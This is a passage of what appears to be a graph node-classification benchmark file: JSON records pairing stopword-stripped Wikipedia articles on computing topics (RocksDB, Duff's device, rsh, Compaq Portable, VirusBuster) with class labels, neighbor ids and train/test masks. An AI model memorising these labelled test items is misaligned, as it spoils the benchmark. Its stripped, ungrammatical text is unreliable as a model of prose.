    "text": "Data_system:data system data system term used refer organized collection symbols processes may used operate symbols organised collection symbols symbol-manipulating operations considered data system hence human-speech analysed level phonemes considered data system incan artefact khipu image stored pixels data system defined terms data model bears resemblance idea physical symbol system symbols within data systems may persistent hence sounds human speech non-persistent symbols decay rapidly air contrast pixels stored peripheral storage device persistent symbols education data system computer system aims provide educators student data help solve educational problems examples data systems include student information systems siss assessment systems instructional management systems imss data-warehousing systems distinctions different types data systems blurring separate systems begin serve functions data systems present data educators over-the-counter data format embed labels supplemental documentation help system make key package/display content decisions improve accuracy data system users ’ data analyses",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 10999,
    "label": 3,
    "text": "Nobunaga's_Ambition:nobunaga ambition games franchise released nintendo entertainment system game boy mega drive 3do super nes playstation sega saturn playstation 2 playstation 3 xbox 360 wii playstation portable playstation vita playstation 4 nintendo switch title also released macintosh well msx amiga ms-dos march 2018 series shipped 10 million copies worldwide player may choose four campaign scenarios including battle east beginning 1560 daimyo power struggles 1560 ambition untamed 1571 road towards unification 1582 scenario player must allocate resources raise capable military force provide productive economy support military civilian expansion support peasants order sustain respect loyalty gameplay taken turns turn map view corresponding season turn battle corresponding day player may achieve victory numerous means among forcing enemy retreat destroying enemy command unit outlasting invading force prolonging battle opposing force exhausted supplies player make many choices campaign according evan brooks computer gaming world one may transfer soldiers fiefs go war increase taxes causes decrease peasant loyalty may lead rebellion transfer rice gold another fief raise level flood control decreases productivity make non-aggression pact arrange marriage cultivate increases productivity decreases peasant loyalty use merchant buy/sell rice borrow funds purchase weapons recruit military soldiers ninja train army increases fighting efficiency spy rival expand town increases taxes collected decreases peasant loyalty give food/rice peasants/soldiers raise morale steal peasants rival daimyos allocate military strength recuperate even daimyo get sick turn controlled fief computer administration pass turn sony playstation vita released asia traditional chinese versions physically copies versions without power kit top japanese versions released nobunaga ambition series garnered several awards years according koei website various releases series log-in magazine bhs prize minister post telecommunications prize nikkei bp 12th 13th 14th annual best pc software awards cd-rom fan fan year 2001 grand prize north america released five years japanese release critical reception also positive game positively reviewed computer gaming world reviewer evan brooks gave four stars five introduced game detailed economic diplomatic political military simulation unification japan sixteenth century praised graphics among best reviewer ever seen ibm 5x10 hex map battles noted used role-playing game elements including assigning various statistics selected persona time system turn represents year daimyo ages eventually dies old age multiplayer option stated thoroughly enjoyed nobunaga ambition concluded highly recommended rating compute similarly praised ibm pc version calling one best strategic war games ever designed personal computer citing game play user interface documentation console versions lukewarm reception reviewing snes version gamepro praised control interface combat system opined game essentially offers nothing set apart koei previous historical simulators magazine rated genesis version similarly saying like koei games nobunaga easy-to-use detailed menu-driven interface activates load complex commands 1996 next generation listed series collectively number 34 top 100 games time commenting lead designer shou kibasawa tactical genius realizes domestic military strategies interconnected fielding armies accomplished building infrastructure support result nobunaga ambition boasts level strategic complexity series come close matching",
    "neighbors": [
      1120,
      10273,
      4706,
      8937,
      3180,
      6797,
      9006,
      9166,
      400,
      10316,
      9077,
      3325
    ],
    "mask": "None"
  },
  {
    "node_id": 11000,
    "label": 5,
    "text": "NetNewsWire:netnewswire netnewswire news aggregator macos netnewswire developed brent sheila simmons company ranchero software introduced july 12 2002 netnewswire lite free version missing advanced features commercial version introduced weeks later version 1.0 released february 11 2003 version 2.0 released may 2005 time included custom feed views custom downloading opening podcasts synchronization feeds feed status computers bloglines support built-in tabbed browser october 2005 newsgator bought netnewswire bringing newsgator online rss synchronization service mac brent simmons hired newsgator continue developing software netnewswire 3.0 released june 5 2007 version added spotlight indexing news items integration ical iphoto address book voodoopad growl support new user interface performance enhancements application originally shareware became free release netnewswire 3.1 january 10 2008 netnewswire lite discontinued time netnewswire 3.2 moved advertisement-supported model option purchase application remove ads ios version netnewswire support iphone ipod touch later ipad released first day app store includes syncing unread articles desktop version netnewswire lite 4.0 introduced march 3 2011 mac app store misses several advanced features included netnewswire 3.2 includes completely rewritten code base future used ios versions app netnewswire 4.0 shareware june 3 2011 acquisition netnewswire black pixel announced two years development apparently stalled gap updates 2011 release version 4 open beta june 24 2013 netnewswire 4.0 announced released open beta black pixel announcement also brought news product would commercial product free component though beta would free use final release final release netnewswire 4.0 occurred september 3 2015 august 31 2018 black pixel announced returned netnewswire intellectual property brent simmons september 1 2018 brent simmons released netnewswire 5.0d1 renamed version open source mac rss reader netnewswire well regarded many users reviewers according feedburner netnewswire popular desktop newsreader platforms 2005 software received macworld editor choice award 2003 2005 maintained 4.8 five stars rating among reviewers versiontracker cnet ars technica called netnewswire built-in browser hands-down best mac newsreader walter mossberg technology columnist wall street journal said netnewswire favorite mac",
    "neighbors": [
      1664,
      3971,
      9732,
      8584,
      4490,
      6539,
      10126,
      11418,
      2076,
      1960,
      1834,
      4013,
      559,
      7983,
      9908,
      7488,
      1346,
      10057,
      5205,
      4310,
      5078,
      6231,
      6237,
      10722,
      5605,
      231,
      9063,
      8169,
      9451,
      8557,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 11001,
    "label": 5,
    "text": "Remote_Shell:remote shell remote shell rsh command line computer program execute shell commands another user another computer across computer network remote system rsh connects runs rsh daemon rshd daemon typically uses well-known transmission control protocol tcp port number 514 rsh originated part bsd unix operating system along rcp part rlogin package 4.2bsd 1983. rsh since ported operating systems rsh command name another common unix utility restricted shell first appeared pwb/unix system v release 4 restricted shell often located /usr/bin/rsh described rlogin article rsh protocol secure network use sends unencrypted information network among reasons implementations also authenticate sending unencrypted passwords network rsh largely replaced secure shell ssh program even local networks example rsh use following executes command mkdir testdir user remoteuser computer host.example.com running unix-like system command finished rsh terminates command specified rsh log remote system using rlogin network location remote computer looked using domain name system",
    "neighbors": [
      2947,
      260,
      10631,
      10387,
      8992,
      10924,
      7983,
      311,
      8504,
      5433,
      9151,
      8386,
      2887,
      6993,
      2132,
      10341,
      5225,
      10732,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 11002,
    "label": 5,
    "text": "List_of_Internet_chess_servers:list internet chess servers list notable internet chess servers",
    "neighbors": [
      469
    ],
    "mask": "None"
  },
  {
    "node_id": 11003,
    "label": 9,
    "text": "Duff's_device:duff device c programming language duff device way manually implementing loop unrolling interleaving two syntactic constructs c loop switch statement discovery credited tom duff november 1983 duff working lucasfilm used speed real-time animation program loop unrolling attempts reduce overhead conditional branching needed check whether loop done executing batch loop bodies per iteration handle cases number iterations divisible unrolled-loop increments common technique among assembly language programmers jump directly middle unrolled loop body handle remainder duff implemented technique c using c case label fall-through feature jump unrolled body duff problem copy 16-bit units shorts c implementations array memory-mapped output register denoted c pointer original code k r c looked follows code assumes initial pointer incremented would required memory-to-memory copy always divisible eight unrolling loop eight-fold would produce following duff realized handle cases divisible eight assembly programmer technique jumping loop body could implemented interlacing structures switch statement loop putting switch labels points loop body correspond remainder duff device similarly applied size unrolled loop eight example based algorithm used widely programmers coding assembly minimizing number tests branches copy duff device appears place implemented c. device valid c virtue two attributes c leads jargon file calls dramatic use yet seen fall c c default fall-through case statements long one controversial features duff said code forms sort argument debate 'm sure whether basic idea loop unrolling number instructions executed loop reduced reducing number loop tests sometimes reducing amount time spent loop example case loop single instruction block code loop test typically performed every iteration loop every time instruction executed instead eight copies instruction placed loop test performed every eight iterations may gain time avoiding seven tests however handles multiple eight iterations requiring something else handle remainder iterations duff device provides solution first performing remainder iterations followed iterating many times necessary multiple eight similar instructions determine number remainder iterations code first calculates total number iterations modulo eight according remainder program execution jump codice_1 statement followed exactly number iterations needed done everything straightforward code continues iterations groups eight instructions become possible since remaining number iterations multiple eight duff device provides compact loop unrolling using case keyword inside outside loop unusual contents case statement traditionally thought block code nested inside case statement reader would typically expect end next case statement according specifications c language necessary indeed case statements appear anywhere inside switch code block depth program execution simply jump next statement wherever may many compilers optimize switch jump table would done assembly implementation primary increase speed versus simple straightforward loop comes loop unwinding reduces number performed branches computationally expensive due need flushand hence stallthe instruction pipeline codice_2 statement used handle remainder data evenly divisible number operations unrolled example eight byte moves unrolled codice_2 handles extra 1–7 bytes automatically automatic handling remainder may best solution systems compilers cases two loops may actually faster one loop unrolled main copy second loop handle remainder problem appears come ability compiler correctly optimize device may also interfere pipelining branch prediction architectures numerous instances duff device removed xfree86 server version 4.0 improvement performance noticeable reduction size executable. ref name= lkml-0008.2/0171 /ref therefore considering code program optimization may worth running benchmarks verify actually fastest code target architecture target optimization level target compiler well weighing risk optimized code later used different platforms fastest code purpose memory-to-memory copies mentioned original use duff device standard c library provides function codice_4 perform worse memory-to-memory copy version code may contain architecture-specific optimizations make significantly faster",
    "neighbors": [
      477,
      10469,
      9739,
      10796,
      4877,
      5236,
      2036,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11004,
    "label": 0,
    "text": "DialogOS:dialogos dialogos graphical programming environment design computer system converse voice user dialogs clicked together flowchart dialogos includes bindings control lego mindstorms robots voice bindings sql databases well generic plugin architecture integrate types backends dialogos used computer science courses schools universities teach programming introduce beginners basic principles human/computer interaction dialog design also used research systems dialogos initially developed commercially clt sprachtechnologie gmbh liquidation 2017 rights acquired saarland university software released open-source dialogos control lego mindstorms nxt series uses sensor-nodes obtain values following sensors",
    "neighbors": [
      4768,
      3533,
      7983,
      214,
      823,
      6838,
      2590
    ],
    "mask": "Test"
  },
  {
    "node_id": 11005,
    "label": 9,
    "text": "Radhia_Cousot:radhia cousot radhia cousot 6 august 1947 – 1 may 2014 french computer scientist known inventing abstract interpretation radhia cousot born 6 august 1947 sakiet sidi youssef tunisia survived went sousse algiers polytechnic school algiers ranked 1st woman specialized mathematical optimization integer linear programming supported unesco fellowship 1972–1975 obtained master degree computer science joseph fourier university grenoble 1972 obtained mathematics nancy 1985 supervision radhia cousot appointed associate research scientist imag laboratory joseph fourier university grenoble 1975–1979 1980 centre national de la recherche scientifique junior research scientist research scientist senior research scientist senior research scientist emerita computer science laboratories henri poincaré university nancy 1980–1983 university paris-sud orsay 1984–1988 école polytechnique 1989–2008 1991 headed research team “ semantics proof abstract interpretation ” école normale supérieure 2006–2014 together husband patrick radhia cousot originator abstract interpretation influential technique formal methods abstract interpretation based three main ideas thesis radhia cousot advanced semantics proof static analysis methods concurrent parallel programs radhia cousot origin contacts airbus january 1999 lead development astrée run-time error analyzer 2001 onwards tool sound static program analysis embedded control/command software developed école normale supérieure distributed absint gmbh german software company specialized static analysis astrée used transportation space medical software industries patrick cousot received acm sigplan programming languages achievement award 2013 ieee computer society ieee computer society harlan d. mills award 2014 “ invention ‘ abstract interpretation ’ development tool support practical application ” since september 2014 radhia cousot best young researcher paper award attributed annually program chair behalf program committee static analysis symposia sas",
    "neighbors": [
      5977,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 11006,
    "label": 4,
    "text": "Packet_Sender:packet sender typical applications packet sender include packet sender comes built-in tcp udp ssl server multiple ports user specifies remains running listening packets sending packets version v6.2.3 packet sender supports following features packet sender mobile also open source available ios android mit license written xamarin core features desktop packet sender send receive tcp udp cloud",
    "neighbors": [
      7140,
      2569,
      842,
      5612,
      10924,
      7983,
      4369,
      3443,
      11413,
      823,
      5657,
      7515,
      10173,
      11486
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11007,
    "label": 3,
    "text": "ShaBLAMM!_NiTro-VLB:shablamm nitro-vlb shablamm nitro-vlb computer system used qed r4600 microprocessor implemented vesa local bus peripheral card designed function connected host computer system using intel i486 nitro-vlb conformed arc standard produced marketed shablamm computer upgrade card accelerating windows nt nitro-vlb notable various unique characteristics among personal computer accessories example although system marketed upgrade computers already using 486 processor nitro-vlb fact entirely different architecture specifically mips architecture ia32-based 486 parasitic symbiotic coprocessor nitro-vlb designed co-opt host 486 processor running used four megabytes host 486 motherboard system memory dma buffer although nitro-vlb required separate dram main memory addition memory installed host 486 motherboard type parasite host upgrade card configuration entire motherboard processor implemented expansion card designed connect host motherboard expansion slot configurations rare among computer systems designed run microsoft windows nitro-vlb qed r4600 processor running 100 mhz rated 73.8 specint92 63 specfp92 similar figures first-generation pentium running 66 mhz faster costlier versions designed run 133 mhz 150 mhz initially nitro-vlb system priced 1,095 100 mhz card main memory 1,995 100 mhz card 16 mb main memory copy windows nt 2,595 150 mhz card",
    "neighbors": [
      7234,
      6854,
      8711,
      11627,
      6797,
      6415,
      7215,
      8976,
      11058,
      2071,
      6942
    ],
    "mask": "Test"
  },
  {
    "node_id": 11008,
    "label": 3,
    "text": "Compaq_Portable:compaq portable compaq portable early portable computer one first 100 ibm pc compatible systems compaq computer corporation first product followed others compaq portable series later compaq deskpro series compaq portable announced november 1982 first shipped march 1983 priced us 2,995 single half-height 5¼ 360 kb diskette drive 3,590 dual full-height diskette drives compaq portable folded luggable case size portable sewing machine computer early all-in-one becoming available two years cp/m-based osborne 1 kaypro ii year ms-dos-based entirely ibm pc compatible dynalogic hyperion year commodore sx-64 design influenced xerox notetaker prototype computer developed xerox parc 1976 ibm responded compaq portable ibm portable developed sales force needed comparable computer sell compaq compaq sold 53,000 units first year total 111 million revenue american business record second year revenue hit 329 million setting industry record third year revenue 503.9 million another us business record compaq portable basically hardware ibm pc transplanted luggable case specifically designed fit carry-on luggage airplane compaq bios instead ibm portables shipped 128k ram 1-2 double-sided double-density 360 kb disk drives machine uses unique hybrid ibm mda cga supports latter graphics modes contains cards text fonts rom using internal monochrome monitor 9x14 font used 8x8 one external monitor used user switches internal external monitors pressing user use ibm video standards graphics capabilities high-resolution text larger external monitor graphics hardware also used original compaq deskpro desktop computer despite success compaq portable flaws hardware foam pads keyboards used make contact circuit board pressed would eventually disintegrate time due wear normal use natural wear would render keyboard useless would require full replacement foam pad affected crt display also suffered low refresh rate heavy ghosting compaq efforts possible ibm used mostly off-the-shelf parts pc published full technical documentation microsoft kept right license ms-dos computer manufacturers difficulty bios contained ibm copyrighted code compaq solved problem producing clean room workalike performed documented functions ibm pc bios completely written scratch although numerous companies soon also began selling pc compatibles matched compaq remarkable achievement essentially-complete software compatibility ibm pc typically reaching 95 compatibility best phoenix technologies others began selling similarly reverse-engineered bioss open market first portables used compaq dos 1.13 essentially identical pc dos 1.10 except standalone basic require ibm pc rom cassette basic superseded months dos 2.00 added hard disk support advanced features aside using dos 1.x initial portables similar 16k-64k models ibm pc bios limited 544k ram support expansion roms thus making unable use ega/vga cards hard disks similar hardware dos 2.x ibm xt came compaq upgraded bios although portable offered factory hard disk users commonly installed starting 1984 compaq began offering hard disk-equipped version portable plus 1985 compaq introduced portable 286 replaced compact portable ii redesigned case within months byte wrote testing prototype compaq portable looks like sure winner portability cost high degree compatibility ibm pc reviewer tested ibm pc dos cp/m-86 wordstar supercalc several software packages found worked except one game pc magazine also rated compaq portable highly compatibility reporting tested applications ran praised rugged hardware design sharp display concluded certainly worth consideration anyone seeking run ibm pc software without ibm pc machine first series compaq portable machines",
    "neighbors": [
      6148,
      10692,
      11100,
      1515,
      8301,
      9166,
      7983,
      1776,
      4337,
      6129,
      8786,
      4409,
      5756,
      1501,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 11009,
    "label": 9,
    "text": "TIOBE_index:tiobe index tiobe programming community index measure popularity programming languages created maintained tiobe company based eindhoven netherlands tiobe stands importance earnest title comedy play oscar wilde first performed 1895 index calculated number search engine results queries containing name language index covers searches google google blogs msn yahoo baidu wikipedia youtube index updated month current information free long term statistics many years observation sale index authors think may valuable accepting various strategic decisions tiobe focuses turing complete languages provide information popularity instance html according site tiobe index best programming language language lines code written however site claim number web pages may reflect number skilled engineers courses jobs worldwide tiobe index sensitive ranking policy search engines based instance april 2004 google performed cleanup action get rid unfair attempts promote search rank consequence large drop languages java c++ yet languages stayed top table avoid fluctuations tiobe uses multiple search engines august 2016 c reached lowest ratings score since index launched still second popular language java since languages substantially gone still maintaining top two positions tiobe programming language year award goes language biggest annual popularity gain index e.g. go programming language year 2016 pierre carbonnelle challenges tiobe naming objective-c programming language year 2012 arguing may many objective-c pages web rarely read proposes pypl index instead based google trends data shows popularity trends since 2004 worldwide 5 different countries tim bunce author perl dbi critical index methods ranking",
    "neighbors": [
      477,
      10470,
      5833,
      8554,
      10345,
      5677,
      11219,
      3705,
      1435,
      2045,
      8735
    ],
    "mask": "Train"
  },
  {
    "node_id": 11010,
    "label": 9,
    "text": "Modula-2+:modula-2+ modula-2+ programming language descended modula-2 language developed dec systems research center src acorn computers ltd research centre palo alto california modula-2+ modula-2 exceptions threads group developed language led p. rovner 1984 main differences modula-2 modula-2+ used develop topaz operating system dec src firefly multiprocessor topaz applications written modula-2+ programming language grew along development system also build programming environment acorn research center arc language completely disappeared great influence programming languages modula-3 original developers modula-2+ bought acorn olivetti digital equipment corporation compaq compaq bought hewlett-packard olivetti also sold olivetti research center olivetti software technology laboratory bought acorn arc oracle later absorbed dec made src-reports available public",
    "neighbors": [
      512,
      9345,
      8262,
      5384,
      11625,
      5612,
      8524,
      7983,
      4341,
      7158,
      6558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11011,
    "label": 6,
    "text": "AppleShare:appleshare appleshare product apple computer implemented various network services main purpose act file server using afp protocol network services implemented later versions appleshare included print server using printer access protocol pap web server electronic mail server smb cifs server support file sharing microsoft windows clients earlier versions appleshare supported appletalk network transport protocol later versions sold name appleshare ip allowed use tcp/ip protocol stack used modern networks appleshare provided three different protocols application-layer services appleshare file server appleshare print server appleshare pc appleshare would operate physical network medium early installations used mainly localtalk recently ethernet physical medium could used could directly indirectly connected appleshare server system equivalent third party server products include open-source netatalk suite unix-like systems services macintosh microsoft windows nt 2000 versions mac os system 7 onwards included personal file sharing limited afp implementation obvious difference personal file sharing appleshare former supports small number concurrent remote users versions mac os capable acting client appleshare server via afp later smb appletalk tcp/ip protocols although recent versions macos gradually removed support appletalk favor standard tcp/ip third-party vendors created client software pc maclan discontinued dave implement client functionality windows systems developers offered server software provided similar functionality windows servers grouplogic extremez-ip cyan software macserverip netatalk linux later versions appleshare also implemented smb cifs protocols native file sharing protocols windows machines apple discontinued appleshare product line following release macos server provides equivalent functionality appleshare ip support 3.0.1 macintosh",
    "neighbors": [
      576,
      225,
      8544,
      9952,
      11554,
      5093,
      7269,
      11688,
      6797,
      1712,
      6993,
      8976,
      5492,
      8404,
      5784,
      7706,
      3007
    ],
    "mask": "Test"
  },
  {
    "node_id": 11012,
    "label": 6,
    "text": "MINIX_file_system:minix file system minix file system native file system minix operating system minix written scratch andrew s. tanenbaum 1980s unix-like operating system whose source code could used freely education minix file system designed use minix copies basic structure unix file system avoids complex features interest keeping source code clean clear simple meet overall goal minix useful teaching aid linus torvalds first started writing linux operating system kernel 1991 working machine running minix adopted file system layout soon proved problematic since minix restricted filename lengths fourteen characters thirty later versions limited partitions 64 megabytes file system designed teaching purposes performance extended file system ext april 1992 developed replace minix second version ext2 linux obtained commercial-grade file system 1994 minix file system scarcely use among linux users minix file system six components",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      10851,
      4708,
      8298,
      9836,
      7789,
      7279,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      671,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      6352,
      7378,
      3795,
      4819,
      8402,
      8404,
      10967,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      2811,
      3328,
      2314,
      8461,
      6416,
      1810,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 11013,
    "label": 2,
    "text": "Amiga_Unix:amiga unix amiga unix informally known amix discontinued full port unix system v release 4 operating system developed commodore-amiga inc. 1990 amiga computer family alternative amigaos shipped default bundled amiga 3000ux commodore unix one first ports svr4 68k architecture amiga a3000ux model even got attention sun microsystems though ultimately nothing came unlike apple a/ux amiga unix contained compatibility layer allow amigaos applications run unix native applications available take advantage amiga significant multimedia capabilities failed find niche quite-competitive unix workstation market early 1990s a3000ux price tag 4,998 also attractive compared unix workstations time nextstation 5,000 base system full api many times number applications available sgi indigo starting 8,000 personal decstation 5000 model 25 starting 5,000 sun hp ibm similarly priced systems a3000ux 68030 noticeably underpowered compared risc-based competitors unlike typical commercial unix distributions time amiga unix included source code vendor-specific enhancements platform-dependent device drivers essentially part n't owned allowing interested users study enhance parts system however source code subject license terms binary part system free software amiga unix also incorporated depended upon many open source components gnu c compiler x window system included source code like many proprietary unix variants small market shares amiga unix vanished mists computer history vendor commodore went business today unix-like operating systems minix netbsd linux available amiga platform",
    "neighbors": [
      2179,
      6787,
      7299,
      6412,
      6675,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      7483,
      9151,
      9665,
      10051,
      10436,
      6369,
      5873,
      5363,
      5492,
      2424,
      633
    ],
    "mask": "Test"
  },
  {
    "node_id": 11014,
    "label": 1,
    "text": "Zentralblatt_MATH:zentralblatt math zbmath formerly zentralblatt math major international reviewing service providing reviews abstracts articles pure applied mathematics produced berlin office fiz karlsruhe – leibniz institute information infrastructure gmbh editors european mathematical society ems fiz karlsruhe heidelberg academy sciences zbmath distributed springer science+business media uses mathematics subject classification codes organising reviews topic mathematicians richard courant otto neugebauer harald bohr together publisher ferdinand springer took initiative foundation new mathematical reviewing journal harald bohr brother famous physicist niels bohr worked copenhagen courant neugebauer professors university göttingen time göttingen considered one central places mathematical research appointed mathematicians like david hilbert hermann minkowski carl runge felix klein great organiser mathematics physics göttingen dream building independent mathematical institute spacious rich reference library realised four years death credit achievement particularly due richard courant convinced rockefeller foundation donate large amount money construction service founded 1931 otto neugebauer zentralblatt für mathematik und ihre grenzgebiete contained bibliographical data recently published mathematical articles book together peer reviews done mathematicians world preface first volume intentions zentralblatt formulated follows zentralblatt für mathematik und ihre grenzgebiete aims publish — efficient reliable manner — reviews entire world literature mathematics related areas issues initially appearing monthly name suggests main focus journal mathematics however areas closely related mathematics treated seriously so-called pure mathematics zentralblatt jahrbuch essence agenda zentralblatt published several issues per year issue published soon sufficiently many reviews available frequency three four weeks late 1930s began rejecting jewish reviewers number reviewers england united states resigned protest helped start mathematical reviews competing publication electronic form provided name inka-math acronym information system karlsruhe-database mathematics since least 1980 name later shortened zentralblatt math zentralblatt math abstracting service provides reviews brief accounts contents current articles conference papers books publications mathematics applications related areas reviews predominantly english occasional entries german french reviewers volunteers invited editors based published work recommendation existing reviewer zentralblatt math provided web printed form service reviews 2,300 journals serials worldwide well books conference proceedings zentralblatt math edited european mathematical society fiz karlsruhe heidelberg academy sciences zentralblatt database also incorporates 200,000 entries earlier similar publication jahrbuch über die fortschritte der mathematik jfm 1868 1942 added 2003 access subscription currently first three records search provided free without subscription",
    "neighbors": [
      1488,
      5496,
      3468
    ],
    "mask": "Test"
  },
  {
    "node_id": 11015,
    "label": 3,
    "text": "Rambo_III_(video_game):rambo iii video game rambo iii series video games based film rambo iii 1988 like film main plots center former vietnam-era green beret john rambo recalled duty one last time rescue former commander colonel sam trautman captured covert operation mission soviet union-controlled afghanistan console versions developed published sega pc dos version developed ocean published taito ocean developed published rest atari st amiga spectrum c64 amstrad taito also released arcade game based film sega master system version released 1988 light gun rail shooter lines operation wolf light phaser supported makes game also unique unlike nes sega master system port ironically port operation wolf long player ammunition game light phaser trigger held supply full automatic shooting ammunition runs though player pull trigger time shooting sega mega drive version released 1989 follows rambo six missions one various objectives besides finding exit level missions prisoners must freed enemy ammunition supplies destroyed rambo controlled overhead perspective several weapons disposal besides machine gun never runs ammo use knife close range kills set timed bombs use famous longbow explosive arrows ammunition bow bombs limited collected dead enemies rambo hand vulnerable killed one hit missions perspective switches view behind rambo additional boss fights take place soviet tanks helicopters must destroyed using crossbow aiming bow rambo move otherwise hide behind rocks obstacles enemy fire reminiscent taito arcade game name also player firing screen helicopters jeeps instead single segment stage whole game played perspective taito released rail shooter based film well features rambo sam trautman playable characters zx spectrum atari st commodore amiga commodore 64 amstrad cpc versions three missions varied console version drastically terms gameplay graphics music",
    "neighbors": [
      9006,
      6390
    ],
    "mask": "Test"
  },
  {
    "node_id": 11016,
    "label": 7,
    "text": "Kyvos:kyvos kyvos big data business intelligence software developed american privately held company named kyvos insights company headquartered los gatos california founded praveen kankariya ceo impetus technologies 2012 software provides olap-based multidimensional analysis big data cloud platforms launched officially june 2015 december year company listed among 10 coolest big data startups 2015 crn magazine software uses olap technology enable business intelligence big data platforms report published forrester research 2016 evaluated several native hadoop business intelligence bi platforms 22 parameters kyvos referred platform gave new life olap bringing hadoop per report kyvos enables analysis hadoop based olap schemas aggregations predefined drill-down paths pre-calculates aggregates multiple levels dimensional hierarchies improve query response times compared sql-on-hadoop platforms users analyze data kyvos visualization tool using bi platforms kyvos originally built hadoop later added support cloud platforms amazon web services aws google cloud microsoft azure initially supported mdx queries integrated data visualization tools excel tableau 2017 kyvos 4.0 added support sql connectivity extending integration bi tools business objects cognos microstrategy power bi qlik late 2018 version 5 software built specifically cloud elastic olap provide cloud native way scale changing data workloads",
    "neighbors": [
      9344,
      6348,
      1935,
      7248,
      5332
    ],
    "mask": "Test"
  },
  {
    "node_id": 11017,
    "label": 1,
    "text": "RocksDB:rocksdb rocksdb high performance embedded database key-value data fork leveldb facebook optimized exploit many central processing unit cpu cores make efficient use fast storage solid-state drives ssd input/output i/o bound workloads based log-structured merge-tree lsm tree data structure written c++ provides official application programming interface api language bindings c++ c java alongside many third-party language bindings rocksdb open-source software originally released bsd 3-clause license however july 2017 project migrated dual license apache 2.0 gplv2 license possibly response apache software foundation blacklist previous bsd+patents license clause rocksdb used production systems various web-scale enterprises including facebook yahoo linkedin rocksdb like leveldb stores keys values arbitrary byte arrays data sorted byte-wise key providing custom comparator rocksdb provides features leveldb plus others list rocksdb features leveldb rocksdb sql database although myrocks combines rocksdb mysql like nosql dbm stores relational data model support sql queries also direct support secondary indexes however user may build internally using column families externally applications use rocksdb library provide server command-line interface rocksdb created facebook dhruba borthakur april 2012 fork leveldb initial stated goal improving performance server workloads embeddable database rocksdb used storage engine within larger database management system dbms example cockroachdb uses rocksdb storage engine mostly transactional workloads rockset uses rocksdb mostly analytical data processing shows rocksdb used storage engine online_transaction_processing online_analytical_processing following projects started replace offer alternative storage engines already-established database systems rocksdb arangodb added rocksdb previous storage engine mmfiles starting arangodb 3.4 rocksdb default storage engine arangodb mongorocks project provides storage module mongodb storage engine rocksdb related program rocks strata tool written go allows managing incremental backups mongodb rocksdb used storage engine myrocks project creates new rocksdb based storage engine mysql in-depth details myrocks presented percona live 2016 mariadb creates myrocks forked rocksdb storage engine since mariadb 10.2.5 cassandra rocksdb improve performance apache cassandra significantly 3-4 times faster general 100 times faster use-cases instagram team facebook developed open-sourced code along benchmarks performance results following database systems applications chosen use rocksdb embedded storage engine ceph bluestore storage layer uses rocksdb metadata management osd devices logdevice logsdb built atop rocksdb facktory background job system uses rocksdb storage ssdb-rocks project uses rocksdb storage engine ssdb nosql database tidb project uses rocksdb storage engine rockset service used operational data analytics uses rocksdb storage engine apache flink uses rocksdb store checkpoints third-party programming language bindings available rocksdb include",
    "neighbors": [
      2051,
      6555,
      1435,
      9245,
      8735,
      3876,
      3366,
      10921,
      4781,
      5165,
      5677,
      7983,
      9518,
      10413,
      10292,
      5047,
      823,
      5560,
      7359,
      8644,
      1222,
      7889,
      2130,
      2901,
      10470,
      9320,
      8554,
      7147,
      7022,
      1776,
      8691,
      4598,
      5879,
      7802,
      7292,
      2045,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 11018,
    "label": 2,
    "text": "Absolute_OpenBSD:absolute openbsd absolute openbsd unix practical paranoid comprehensive guide openbsd operating system michael w. lucas author absolute freebsd cisco routers desperate book assumes basic knowledge design commands user permissions unix-like operating systems book contains troubleshooting tips background information system commands examples assist learning first edition released june 2003 information book became outdated openbsd 3.4 released months later second edition released april 2013 peter n. m. hansteen author book pf technical reviewer",
    "neighbors": [
      5397,
      1509,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11019,
    "label": 4,
    "text": "VirusBuster:virusbuster virusbuster ltd. one hungarian it-security software vendors fully hungarian owned company develops products – brand name virusbuster – hungarian international market protect users computers malware programs various it-security threats august 2012 virusbuster ltd. announced cancellation anti-virus products https //web.archive.org/web/20120810040828/http //www.virusbuster.hu/termekek/termekhirek/virusbuster-termekek-kivezetese-0 1 nowiki /nowiki virusbuster shut entire developing malware analyst team joined sophos legal trade predecessor firm began develop antiviral products end 1980s software named virsec came time well known vendors appeared similar solutions 1992 virsec renamed virusbuster later official formation firm name became name company well 1997 official foundation virusbuster ltd took place next years company produced mainly anti-viral products hungarian market primarily governmental sector 2000 year international opening virusbuster products began participating international test summer year firm began build international partnerships also 2000 2000 2003 virusbuster steadily extended portfolio developments manifested increasing number protected platforms systems also new layered security products target new threats management system firm security products achievements company could offer effective security solutions every organizational customers 2001 first year international foreigner company – australian leprechaun – licensed virusbuster antiviral technology integrate security products 2003 2006 virusbuster strengthened eastern european worldwide market positions antiviral engine company became independent product thus integrated several firms security solutions years virusbuster appeared american market august 2012 agnitum pc security expert manufacturer outpost range security products announced acquisition antivirus technology infrastructure long-term partner virusbuster october 2012 owner virusbuster made decision 